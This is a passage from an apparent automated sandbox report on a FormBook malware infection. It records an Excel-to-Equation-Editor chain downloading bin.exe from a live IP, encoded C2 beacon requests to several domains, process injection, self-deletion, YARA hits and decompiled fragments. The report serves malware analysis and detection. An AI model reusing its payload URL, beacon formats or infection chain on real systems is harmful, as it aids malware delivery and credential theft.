                                                                                                                                                  Jul 22, 2021 17:11:04.499974966 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.499985933 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.499996901 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500016928 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500019073 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500046968 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500052929 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500072956 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500076056 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500092983 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500102997 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500113964 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500135899 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500158072 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500160933 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500180006 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500200033 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500221014 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500230074 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500255108 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500263929 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500277042 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500294924 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500297070 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500322104 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500335932 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500349045 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500356913 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500379086 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500380993 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500402927 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500411987 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500439882 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500447035 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500483990 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500502110 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500507116 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500533104 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500551939 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500555038 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500574112 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500582933 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500597000 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500613928 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500618935 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500639915 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500667095 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500667095 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500690937 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500711918 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500713110 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500736952 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500735998 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500766993 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500782967 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500793934 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500806093 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500825882 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500828028 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500850916 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500850916 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500878096 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500905037 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500905991 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500930071 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500955105 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500971079 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.500993013 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.500996113 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501015902 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.501040936 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.501043081 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501065016 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.501070023 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501097918 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501101971 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.501126051 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501127958 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.501153946 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.501182079 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.518604040 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.520745039 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:04.807189941 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807229042 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807252884 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807271004 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807290077 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807311058 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807337999 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807360888 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807382107 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:04.807404041 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.417220116 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.541697025 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543577909 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543642044 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543684959 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543699980 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543711901 CEST8049169199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.543951988 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.543973923 CEST4916980192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:12:42.543977976 CEST4916980192.168.2.22199.59.242.153

                                                                                                                                                  UDP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jul 22, 2021 17:12:26.765960932 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 22, 2021 17:12:26.827300072 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
| Jul 22, 2021 17:12:37.045444965 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 22, 2021 17:12:37.119473934 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
| Jul 22, 2021 17:12:42.149930000 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 22, 2021 17:12:42.290482044 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
| Jul 22, 2021 17:12:47.553082943 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
| Jul 22, 2021 17:12:47.622333050 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |

                                                                                                                                                  DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jul 22, 2021 17:12:26.765960932 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.thinking-diversity.com | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:37.045444965 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.compareionizers.com | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:42.149930000 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.globaltradeview.com | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:47.553082943 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.legifo.com | A (IP address) | IN (0x0001) |

                                                                                                                                                  DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jul 22, 2021 17:12:26.827300072 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.thinking-diversity.com | thinking-diversity.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 22, 2021 17:12:26.827300072 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | thinking-diversity.com | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:37.119473934 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Server failure (2) | www.compareionizers.com | none | none | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:42.290482044 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.globaltradeview.com | | 199.59.242.153 | A (IP address) | IN (0x0001) |
| Jul 22, 2021 17:12:47.622333050 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.legifo.com | | 52.58.78.16 | A (IP address) | IN (0x0001) |

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 103.155.80.130
                                                                                                                                                  • www.thinking-diversity.com
                                                                                                                                                  • www.globaltradeview.com

                                                                                                                                                  HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.22 | 49167 | 103.155.80.130 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |

Timestamp: Jul 22, 2021 17:11:01.858670950 CEST; kBytes transferred: 0; Direction: OUT; Data:
GET /kung/bin.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.155.80.130
Connection: Keep-Alive

Timestamp: Jul 22, 2021 17:11:02.188283920 CEST; kBytes transferred: 1; Direction: IN; Data:
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 15:11:11 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
Last-Modified: Wed, 21 Jul 2021 22:09:30 GMT
ETag: "b0200-5c7a96cb69dfd"
Accept-Ranges: bytes
Content-Length: 721408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.22 | 49168 | 34.102.136.180 | 80 | C:\Windows\explorer.exe |

Timestamp: Jul 22, 2021 17:12:26.881021023 CEST; kBytes transferred: 761; Direction: OUT; Data:
GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
Host: www.thinking-diversity.com
Connection: close

Timestamp: Jul 22, 2021 17:12:27.021441936 CEST; kBytes transferred: 762; Direction: IN; Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 22 Jul 2021 15:12:26 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ef677e-113"
Via: 1.1 google
Connection: close
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.2.22 | 49169 | 199.59.242.153 | 80 | C:\Windows\explorer.exe |

Timestamp: Jul 22, 2021 17:12:42.417220116 CEST; kBytes transferred: 763; Direction: OUT; Data:
GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
Host: www.globaltradeview.com
Connection: close

Timestamp: Jul 22, 2021 17:12:42.543577909 CEST; kBytes transferred: 764; Direction: IN; Data:
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 22 Jul 2021 15:12:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ==


                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:17:10:48
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x13f620000
                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:09
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:14
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:37
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:38
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:51
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Imagebase:0xbe0000
                                                                                                                                                  File size:77312 bytes
                                                                                                                                                  MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:56
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4a6c0000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                    Executed Functions

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: 9A$!:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-2349363835
                                                                                                                                                    • Opcode ID: b394143b222f7462b798372a2dce86ca23a2a6af17bed1276118a43d14d65779
                                                                                                                                                    • Instruction ID: b3e9ec29cccaf7c3bbbf06ff514fb2ee608965d537aa7c6c7265ebdbd010425a
                                                                                                                                                    • Opcode Fuzzy Hash: b394143b222f7462b798372a2dce86ca23a2a6af17bed1276118a43d14d65779
                                                                                                                                                    • Instruction Fuzzy Hash: AF11C0B6200108AFCB14DFA9D880DEB77A9AF8C354B158249FA1DA3241C630E8518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                                                                                                    				void* _t18;
                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                    
                                                                                                                                                    				_t13 = _a4;
                                                                                                                                                    				_t27 = _a4 + 0xc48;
                                                                                                                                                    				E00418DD0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                    				_t4 =  &_a40; // 0x413a21
                                                                                                                                                    				_t6 =  &_a32; // 0x413d62
                                                                                                                                                    				_t12 =  &_a8; // 0x413d62
                                                                                                                                                    				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                                                                                                    				return _t18;
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 23%
                                                                                                                                                    			E0041827B(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                                                                                                    				void* _t21;
                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                    				void* _t34;
                                                                                                                                                    
                                                                                                                                                    				asm("pushfd");
                                                                                                                                                    				_t16 = _a4;
                                                                                                                                                    				_t32 = _a4 + 0xc48;
                                                                                                                                                    				E00418DD0(_t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                                                                                                                    				_t5 =  &_a40; // 0x413a21
                                                                                                                                                    				_t7 =  &_a32; // 0x413d62
                                                                                                                                                    				_t13 =  &_a8; // 0x413d62
                                                                                                                                                    				_t21 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t34); // executed
